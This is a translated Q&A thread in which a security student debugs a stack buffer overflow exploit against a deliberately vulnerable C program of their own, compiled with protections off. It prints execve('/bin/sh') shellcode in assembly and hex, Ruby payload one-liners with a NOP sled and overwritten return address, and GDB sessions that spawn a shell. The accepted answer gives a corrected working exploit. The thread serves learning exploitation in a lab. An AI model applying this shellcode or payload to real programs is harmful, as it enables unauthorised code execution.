Syscall inside shellcode won't run

Question

Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.

I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.

I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.

In more details:

This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

int do_bof(char *exploit) {
    char buf[128];

    strcpy(buf, exploit);
    return 1;
}

int main(int argc, char *argv[]) {
    if(argc < 2) {
        puts("Usage: bof <any>");
        return 0;
    }

    do_bof(argv[1]);
    puts("Failed to exploit.");
    return 0;
}

This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.

global _start

section .text
_start:
    jmp short push_shell
starter:
    pop rdi
    mov al, 59
    xor rsi, rsi
    xor rdx, rdx
    xor rcx, rcx
    syscall
    xor al, al
    mov BYTE [rdi], al
    mov al, 60
    syscall
push_shell:
    call starter
shell:
    db  "/bin/sh"

This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):

spawn_shell.o: formato do arquivo elf64-x86-64

Desmontagem da seção .text:

0000000000000000 <_start>:
   0:   eb 16                   jmp    18 <push_shell>

0000000000000002 <starter>:
   2:   5f                      pop    rdi
   3:   b0 3b                   mov    al,0x3b
   5:   48 31 f6                xor    rsi,rsi
   8:   48 31 d2                xor    rdx,rdx
   b:   48 31 c9                xor    rcx,rcx
   e:   0f 05                   syscall 
  10:   30 c0                   xor    al,al
  12:   88 07                   mov    BYTE PTR [rdi],al
  14:   b0 3c                   mov    al,0x3c
  16:   0f 05                   syscall 

0000000000000018 <push_shell>:
  18:   e8 e5 ff ff ff          call   2 <starter>

000000000000001d <shell>:
  1d:   2f                      (bad)  
  1e:   62                      (bad)  
  1f:   69                      .byte 0x69
  20:   6e                      outs   dx,BYTE PTR ds:[rsi]
  21:   2f                      (bad)  
  22:   73 68                   jae    8c <shell+0x6f>

This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:

ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'

So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:

The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes alright until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.

The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.

That's the main problem: The syscall won't work.

Some notes:

Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64 bit shellcode.

This shellcode works in the following code:

char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {
    void (*func)();
    func = (void (*)()) shellcode;
    (void)(func)();
}

What's wrong with my shellcode?

EDIT 1:

Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:

spawn_shell: formato do arquivo elf64-x86-64


Desmontagem da seção .text:

0000000000400080 <_start>:
  400080:   eb 1e                   jmp    4000a0 <push_shell>

0000000000400082 <starter>:
  400082:   5f                      pop    %rdi
  400083:   48 31 c0                xor    %rax,%rax
  400086:   88 47 07                mov    %al,0x7(%rdi)
  400089:   b0 3b                   mov    $0x3b,%al
  40008b:   48 31 f6                xor    %rsi,%rsi
  40008e:   48 31 d2                xor    %rdx,%rdx
  400091:   48 31 c9                xor    %rcx,%rcx
  400094:   0f 05                   syscall 
  400096:   48 31 c0                xor    %rax,%rax
  400099:   48 31 ff                xor    %rdi,%rdi
  40009c:   b0 3c                   mov    $0x3c,%al
  40009e:   0f 05                   syscall 

00000000004000a0 <push_shell>:
  4000a0:   e8 dd ff ff ff          callq  400082 <starter>
  4000a5:   2f                      (bad)  
  4000a6:   62                      (bad)  
  4000a7:   69                      .byte 0x69
  4000a8:   6e                      outsb  %ds:(%rsi),(%dx)
  4000a9:   2f                      (bad)  
  4000aa:   73 68                   jae    400114 <push_shell+0x74>

If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.

Therefore, you shellcode run alright as a standalone program is not a proof that it works.

The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.

$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof    bof2.c  bof3_env      bof3_new_shellcode.txt bof3_shellcode.txt  get_shell     shellcode_exit    shellcode_hello.c  shellcode_shell2
bof.c  bof3    bof3_env.c    bof3_non_dbg        func_stack      get_shell.c      shellcode_exit.c  shellcode_shell    shellcode_shell2.c
bof2   bof3.c  bof3_gdb_env  bof3_run_env        func_stack.c    shellcode_bof.c  shellcode_hello   shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)

And outside:

$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)

Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it

Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:

$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$

So now, this is the second question: Why the exploit works inside GDB but does not outside it?

At a guess `strcpy` only copies to the first 0 byte. So if the exploit contains any 0s then you're only copying the part of the exploit before the first 0. — John3136, Jul 28 '15 at 00:12

score 3 · Accepted Answer · answered Jul 28 '15 at 00:45

The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.

The full exploit could look like:

ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'

The initial part corresponds to:

    jmp short push_shell
starter:
    pop rdi
    xor eax, eax
    mov [rdi + 7], al
    mov al, 59

Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.

The above code (with the return address adjusted for my system) works fine here.

Ok, ok... You shellcode worked and I remade my shellcode to it works. However, an even stranger problem raised: The exploit works inside GDB, but does not work with the program as a standalone. =D — Sid, Jul 28 '15 at 02:43
Slightly different memory layout when standalone. If you use the correct address it works in standalone too. — Jester, Jul 28 '15 at 10:10

Syscall inside shellcode won't run

1 Answers1